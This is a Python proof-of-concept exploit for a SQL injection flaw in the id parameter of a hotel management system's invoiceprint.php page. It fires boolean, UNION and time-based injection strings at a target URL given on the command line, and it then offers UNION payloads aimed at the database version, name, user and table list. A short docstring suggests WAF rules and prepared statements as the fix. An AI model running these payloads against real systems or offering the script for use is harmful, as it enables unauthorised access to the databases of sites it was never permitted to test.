#!/usr/bin/env python3
# CVE-2025-14207 SQL Injection PoC
# Hotel-Management-System /admin/invoiceprint.php
# CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
import requests
import sys
# Default endpoint; the `__main__` section below replaces it with sys.argv[1]
# when one is given. "target.com" is a placeholder host.
TARGET_URL = "http://target.com/admin/invoiceprint.php"
def test_sql_injection() -> None:
    """Probe the ``id`` query parameter of TARGET_URL with a fixed list of injection strings.

    Each payload is sent as ``?id=<payload>`` in a GET request. For every
    response the status code and body length are printed, and the body is
    searched case-insensitively for a short list of MySQL/PHP error fragments;
    a hit is reported as a *potential* indicator only. Nothing is returned;
    all output goes to stdout. Request-level failures are printed and the
    next payload is tried.

    Defender notes: these exact strings in the ``id`` parameter are what a
    WAF rule or access-log review for invoiceprint.php would key on; the
    root-cause fix is a parameterised query (prepared statement) in the PHP
    handler instead of concatenating ``id`` into SQL.
    """
    # Basic SQL injection test payloads
    payloads = [
        "1' OR '1'='1",
        "1' UNION SELECT 1,2,3,4,5,6-- -",
        "1' AND SLEEP(5)-- -",
        "1' OR 1=1 LIMIT 1-- -"
    ]
    # Fixed browser-like User-Agent; nothing else in the request is customised.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    # f-string with no placeholders; a plain string literal would do the same.
    print(f"[*] Testing CVE-2025-14207 SQL Injection")
    print(f"[*] Target: {TARGET_URL}")
    for payload in payloads:
        try:
            params = {"id": payload}
            # verify=False disables TLS certificate validation; for an https
            # target requests/urllib3 emit an InsecureRequestWarning per call.
            response = requests.get(
                TARGET_URL,
                params=params,
                headers=headers,
                timeout=10,
                verify=False
            )
            print(f"\n[*] Payload: {payload}")
            print(f"[*] Status Code: {response.status_code}")
            print(f"[*] Response Length: {len(response.text)}")
            # Check for SQL error messages
            # Substrings taken as signs of a database error leaking into the
            # page. The comparison below lower-cases both sides, so "Warning"
            # matches any PHP warning/notice text and is a weak signal on its own.
            sql_errors = [
                "mysql_fetch",
                "mysqli_fetch",
                "SQL syntax",
                "Warning",
                "mysql_num_rows"
            ]
            for error in sql_errors:
                if error.lower() in response.text.lower():
                    print(f"[!] Potential SQL error detected: {error}")
        except requests.exceptions.RequestException as e:
            # Timeouts, connection errors and similar transport failures land
            # here; the loop continues with the next payload.
            print(f"[!] Request failed: {e}")
def extract_database_info() -> None:
    """Send four UNION-based payloads via the ``id`` parameter and print each HTTP status.

    One GET request per key (version, database, user, tables) is issued to
    TARGET_URL. Only the status code is printed; the response body is not
    inspected or displayed, so the output shows that each request completed,
    not any database content. Nothing is returned. Request-level failures are
    printed and the next key is tried.
    """
    # UNION-based injection to get database info
    info_payloads = {
        "version": "1' UNION SELECT 1,@@version,3,4,5,6-- -",
        "database": "1' UNION SELECT 1,database(),3,4,5,6-- -",
        "user": "1' UNION SELECT 1,user(),3,4,5,6-- -",
        "tables": "1' UNION SELECT 1,group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -"
    }
    # Same fixed User-Agent as test_sql_injection().
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    print("\n[*] Extracting database information...")
    for info_type, payload in info_payloads.items():
        try:
            params = {"id": payload}
            # verify=False disables TLS certificate validation; for an https
            # target requests/urllib3 emit an InsecureRequestWarning per call.
            response = requests.get(
                TARGET_URL,
                params=params,
                headers=headers,
                timeout=10,
                verify=False
            )
            # Only the status is reported; response.text is never read here.
            print(f"\n[*] {info_type.upper()}:")
            print(f"[*] Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            # Transport failure for this key; continue with the remaining keys.
            print(f"[!] Failed to extract {info_type}: {e}")
if __name__ == "__main__":
    # Optional first CLI argument replaces the default target URL. This block
    # runs at module scope, so the assignment rebinds the global that both
    # functions read.
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    test_sql_injection()
    # Interactive gate before the second phase; only 'y' or 'Y' proceeds.
    # Note this `response` is the typed answer, unrelated to the HTTP
    # `response` locals inside the functions.
    response = input("\n[*] Do you want to extract database information? (y/n): ")
    if response.lower() == 'y':
        extract_database_info()